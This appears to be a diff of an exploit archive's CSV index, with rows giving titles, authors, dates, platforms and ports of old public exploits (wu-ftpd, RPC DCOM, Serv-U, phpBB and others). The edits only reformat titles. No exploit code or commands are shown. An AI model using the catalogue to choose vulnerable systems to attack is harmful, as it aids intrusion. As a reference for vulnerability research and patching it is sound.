 72,platforms/linux/local/72.c,"xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0
 73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service Exploit",2003-08-01,l0bstah,windows,dos,0
 74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 - off-by-one Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21
-75,platforms/linux/local/75.c,"man-db 2.4.1 open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0
+75,platforms/linux/local/75.c,"man-db 2.4.1 - open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0
 76,platforms/windows/remote/76.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135
-77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80
+77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80
 78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21
-79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0
+79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server - SYSTEM Exploit",2003-08-13,ash,windows,local,0
 80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
 38772,platforms/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80
 81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0
 82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0
-83,platforms/windows/remote/83.html,"Microsoft Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0
+83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0
 84,platforms/linux/remote/84.c,"Gopherd <= 3.0.5 - FTP Gateway Remote Overflow Exploit",2003-08-22,vade79,linux,remote,70
 86,platforms/multiple/remote/86.c,"Real Server 7/8/9 - Remote Root Exploit (Windows & Linux)",2003-08-25,"Johnny Cyberpunk",multiple,remote,554
 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow Exploit",2003-08-28,vade79,linux,remote,21
 89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23
-90,platforms/windows/remote/90.c,"eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661
+90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661
 91,platforms/linux/local/91.c,"Stunnel <= 3.24/4.00 - Daemon Hijacking Proof of Concept Exploit",2003-09-05,"Steve Grubb",linux,local,0
-92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0
+92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter - Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0
 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Local Privilege Escalation Exploit",2003-09-09,"Jon Hart",linux,local,0
 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 - DoS",2003-09-08,badpack3t,multiple,dos,80
-95,platforms/multiple/remote/95.c,"Roger Wilco 1.x Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0
+95,platforms/multiple/remote/95.c,"Roger Wilco 1.x - Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0
 96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite - Remote Buffer Overflow Exploit",2003-09-11,B-r00t,osx,remote,21
 97,platforms/windows/remote/97.c,"Microsoft Windows - (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135
 98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Exploit",2003-09-14,bkbll,linux,remote,3306
 99,platforms/linux/remote/99.c,"Pine <= 4.56 - Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0
 100,platforms/windows/remote/100.c,"Microsoft Windows - (RPC DCOM) Long Filename Overflow Exploit (MS03-026)",2003-09-16,ey4s,windows,remote,135
-101,platforms/solaris/remote/101.pl,"Solaris Sadmind Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111
+101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111
 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit",2003-09-20,anonymous,linux,remote,617
 103,platforms/windows/remote/103.c,"Microsoft Windows - (RPC DCOM2) Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135
 104,platforms/linux/local/104.c,"hztty 2.0 - Local Root Exploit (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0
@@ -107,9 +107,9 @@ id,file,description,date,author,platform,type,port
 107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
 109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135
 110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21
-111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0
+111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0
 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow Exploit",2003-10-21,blasty,windows,remote,0
-113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0
+113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0
 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow Exploit (SPARC version)",2003-10-27,osker178,solaris,local,0
 115,platforms/linux/dos/115.c,"wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service Exploit",2003-10-31,"Angelo Rosiello",linux,dos,0
 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server <= 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515
@@ -117,20 +117,20 @@ id,file,description,date,author,platform,type,port
 118,platforms/bsd/local/118.c,"OpenBSD - (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0
 119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0
 120,platforms/linux/local/120.c,"TerminatorX <= 3.81 - Stack Overflow Local Root Exploit",2003-11-13,Li0n7,linux,local,0
-121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80
+121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions - fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80
 122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0
-123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0
+123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service - WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0
 124,platforms/windows/remote/124.pl,"IA WebMail 3.x - (iaregdll.dll 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80
 125,platforms/bsd/local/125.c,"OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0
 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) <= 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80
 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0
 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Root Exploit (Proof of Concept) (1)",2003-12-02,"Christophe Devine",linux,local,0
-130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
+130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service - Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
 131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 - 'do_brk()' Local Root Exploit (2)",2003-12-05,"Wojciech Purczynski",linux,local,0
 132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80
 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80
 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0
-135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
+135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80
 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - search_id SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0
 138,platforms/php/webapps/138.pl,"PHP-Nuke <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0
@@ -149,17 +149,17 @@ id,file,description,date,author,platform,type,port
 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0
 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
 154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Proof of Concept (2)",2004-02-18,"Christophe Devine",linux,local,0
-155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128
+155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128
 156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080
 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x - (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21
 159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21
 160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1)",2004-03-01,"Paul Starzetz",linux,local,0
 161,platforms/windows/dos/161.c,"Red Faction <= 1.20 - Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0
-163,platforms/windows/remote/163.pl,"Eudora 6.0.3 Attachment Spoofing Exploit (windows)",2004-03-19,anonymous,windows,remote,0
-164,platforms/windows/remote/164.c,"Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0
+163,platforms/windows/remote/163.pl,"Eudora 6.0.3 - Attachment Spoofing Exploit (Windows)",2004-03-19,anonymous,windows,remote,0
+164,platforms/windows/remote/164.c,"Foxmail 5.0 - PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0
 165,platforms/windows/remote/165.c,"WS_FTP Server <= 4.0.2 - ALLO Remote Buffer Overflow Exploit",2004-03-23,"Hugh Mann",windows,remote,21
-166,platforms/windows/remote/166.pl,"eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit",2004-03-26,VizibleSoft,windows,remote,80
+166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow Exploit",2004-03-26,VizibleSoft,windows,remote,80
 167,platforms/linux/remote/167.c,"Ethereal 0.10.0-0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0
 168,platforms/windows/remote/168.c,"RealSecure / Blackice iss_pam1.dll Remote Overflow Exploit",2004-03-28,Sam,windows,remote,0
 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products Vulnerabilities Exploit (Cisco Global Exploiter)",2004-03-28,blackangels,hardware,remote,0
@@ -222,33 +222,33 @@ id,file,description,date,author,platform,type,port
 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) Exploit",2000-12-15,mat,linux,local,0
 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0
 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0
-234,platforms/bsd/remote/234.c,"OpenBSD 2.6 - / 2.7ftpd Remote Exploit",2000-12-20,Scrippie,bsd,remote,21
+234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21
 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0
-236,platforms/linux/dos/236.sh,"Redhat 6.1 - / 6.2 TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0
+236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0
 237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - (TCP/IP Weakness) Exploit",2001-01-02,Stealth,linux,remote,513
 238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0
 239,platforms/solaris/remote/239.c,"wu-ftpd 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21
-240,platforms/solaris/dos/240.sh,"Solaris 2.6 - / 7 / 8 Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0
+240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0
 241,platforms/linux/dos/241.c,"ProFTPD 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21
 242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi Remote Command Execution Exploit",2001-01-12,"Marco van Berkum",cgi,webapps,0
 243,platforms/bsd/local/243.c,"BSD chpass - (pw_error(3)) Local Root Exploit",2001-01-12,caddis,bsd,local,0
 244,platforms/linux/dos/244.java,"ProFTPD <= 1.2.0pre10 - Remote Denial of Service Exploit",2001-01-12,JeT-Li,linux,dos,21
 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation Exploit",2001-01-13,zorgon,hp-ux,local,0
-247,platforms/solaris/local/247.c,"Solaris 2.5 - / 2.5.1 getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0
+247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0
 249,platforms/linux/local/249.c,"GLIBC - Locale Format Strings Exploit",2003-01-15,logikal,linux,local,0
-250,platforms/solaris/local/250.c,"Solaris 7 - / 8-beta arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0
+250,platforms/solaris/local/250.c,"Solaris 7 / 8-beta - arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0
 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - (apcupsd) Local Denial of Service Exploit",2001-01-15,"the itch",linux,dos,0
 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux Exploit",2001-01-15,teleh0r,linux,local,0
 253,platforms/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow Exploit",2001-01-19,teleh0r,linux,remote,143
 254,platforms/hardware/remote/254.c,"Cisco Password Bruteforcer Exploit",2001-01-19,norby,hardware,remote,23
 255,platforms/linux/local/255.pl,"Redhat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0
-256,platforms/solaris/local/256.c,"Solaris 2.6 - / 2.7 /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0
+256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0
 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow Exploit",2001-01-25,teleh0r,linux,local,0
 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc <= 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0
 259,platforms/tru64/local/259.c,"Tru64 5 - (su) Env Local Stack Overflow Exploit",2001-01-26,K2,tru64,local,0
 260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0
 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit",2001-01-26,K2,sco,local,0
-262,platforms/hardware/dos/262.pl,"Cisco Multiple Products Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0
+262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0
 263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80
 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service Exploit",2001-05-07,honoriak,novell,dos,0
 265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0
@@ -339,7 +339,7 @@ id,file,description,date,author,platform,type,port
 362,platforms/windows/dos/362.sh,"Xitami Web Server Denial of Service Exploit",2004-07-22,CoolICE,windows,dos,0
 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service",2004-07-22,"Seth Alan Woolley",hardware,dos,0
 364,platforms/linux/remote/364.pl,"Samba <= 3.0.4 - SWAT Authorization Buffer Overflow Exploit",2004-07-22,"Noam Rathaus",linux,remote,901
-365,platforms/windows/dos/365.html,"Microsoft Internet Explorer (11 bytes) Denial of Service Exploit",2004-07-23,Phuong,windows,dos,0
+365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service Exploit (11 bytes)",2004-07-23,Phuong,windows,dos,0
 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service Exploit",2004-07-24,MacDefender,windows,dos,0
 367,platforms/osx/local/367.txt,"Mac OS X - Panther Internet Connect Local Root Exploit",2004-07-28,B-r00t,osx,local,0
 368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0
@@ -509,7 +509,7 @@ id,file,description,date,author,platform,type,port
 657,platforms/linux/local/657.c,"atari800 - Local Root Exploit",2004-11-25,pi3,linux,local,0
 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP <= 1.52 - Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143
 659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0
-660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80
+660,platforms/linux/remote/660.c,"PHP <= 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80
 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0
 663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143
 664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 - MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0
@@ -646,7 +646,7 @@ id,file,description,date,author,platform,type,port
 820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0
 822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21
 823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21
-824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated)",2005-09-13,Qnix,linux,local,0
+824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0
 825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21
 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203
 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote BoF Exploit",2005-02-18,class101,windows,remote,21
@@ -703,7 +703,7 @@ id,file,description,date,author,platform,type,port
 880,platforms/multiple/dos/880.pl,"Freeciv Server <= 2.0.0beta8 - Denial of Service Exploit",2005-03-14,"Nico Spicher",multiple,dos,0
 881,platforms/php/webapps/881.txt,"ZPanel <= 2.5 - Remote SQL Injection Exploit",2005-03-15,Mikhail,php,webapps,0
 882,platforms/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash Exploit",2005-03-15,Komrade,windows,dos,0
-883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (updated)",2005-04-24,cybertronic,windows,remote,2380
+883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (2)",2005-04-24,cybertronic,windows,remote,2380
 884,platforms/windows/local/884.cpp,"iSnooker <= 1.6.8 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0
 885,platforms/windows/local/885.cpp,"iPool <= 1.6.81 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0
 886,platforms/windows/dos/886.pl,"PlatinumFTP <= 1.0.18 - Multiple Remote Denial of Service Exploit",2005-03-17,ports,windows,dos,0
@@ -814,15 +814,15 @@ id,file,description,date,author,platform,type,port
 1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0
 1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0
 1003,platforms/php/webapps/1003.c,"Fusion SBX <= 1.2 - Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0
-1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated)",2005-05-20,Nikyt0x,cgi,webapps,0
-1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1st)",2005-05-20,Alpha_Programmer,cgi,webapps,0
+1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2)",2005-05-20,Nikyt0x,cgi,webapps,0
+1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1)",2005-05-20,Alpha_Programmer,cgi,webapps,0
 1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board <= 2.3.1 register.php SQL-Injection Exploit",2005-05-20,deluxe89,php,webapps,0
 1007,platforms/multiple/remote/1007.html,"Mozilla Firefox view-source:javascript url Code Execution Exploit",2005-05-21,mikx,multiple,remote,0
 1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS Denial of Service Exploit",2005-05-21,"Daniel Hartmeier",multiple,dos,0
 1009,platforms/linux/local/1009.c,"Exim <= 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0
-1010,platforms/asp/webapps/1010.pl,"Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl)",2005-05-26,Alpha_Programmer,asp,webapps,0
-1011,platforms/asp/webapps/1011.php,"Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php)",2005-05-26,mh_p0rtal,asp,webapps,0
-1012,platforms/asp/webapps/1012.txt,"Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html)",2005-05-26,"Soroush Dalili",asp,webapps,0
+1010,platforms/asp/webapps/1010.pl,"Maxwebportal <= 1.36 password.asp Change Password Exploit (3) (perl)",2005-05-26,Alpha_Programmer,asp,webapps,0
+1011,platforms/asp/webapps/1011.php,"Maxwebportal <= 1.36 password.asp Change Password Exploit (2) (php)",2005-05-26,mh_p0rtal,asp,webapps,0
+1012,platforms/asp/webapps/1012.txt,"Maxwebportal <= 1.36 password.asp Change Password Exploit (1) (html)",2005-05-26,"Soroush Dalili",asp,webapps,0
 1013,platforms/php/webapps/1013.pl,"Invision Power Board <= 2.0.3 - Login.php SQL Injection Exploit",2005-05-26,"Petey Beege",php,webapps,0
 1014,platforms/php/webapps/1014.txt,"Invision Power Board <= 2.0.3 - Login.php SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0
 1015,platforms/asp/webapps/1015.txt,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (3rd)",2005-05-27,"Soroush Dalili",asp,webapps,0
@@ -931,7 +931,7 @@ id,file,description,date,author,platform,type,port
 1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d <= 0.6 - Remote Format String Exploit",2005-08-01,CoKi,linux,remote,143
 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server <= 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143
 1126,platforms/windows/dos/1126.c,"BusinessMail Server <= 4.60.00 - Remote Denial of Service Exploit",2005-08-01,Kozan,windows,dos,0
-1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 - (Fix-2) Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0
+1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 (Fix-2) - Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0
 1128,platforms/windows/local/1128.c,"Microsoft Windows - (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0
 1129,platforms/windows/dos/1129.c,"Quick 'n EasY <= 3.0 FTP Server Remote Denial of Service Exploit",2005-08-02,Kozan,windows,dos,0
 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070
@@ -1122,7 +1122,7 @@ id,file,description,date,author,platform,type,port
 1345,platforms/php/dos/1345.php,"Xaraya <= 1.0.0 RC4 - create() Denial of Service Exploit",2005-11-29,rgod,php,dos,0
 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0
 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 - (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0
-1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0
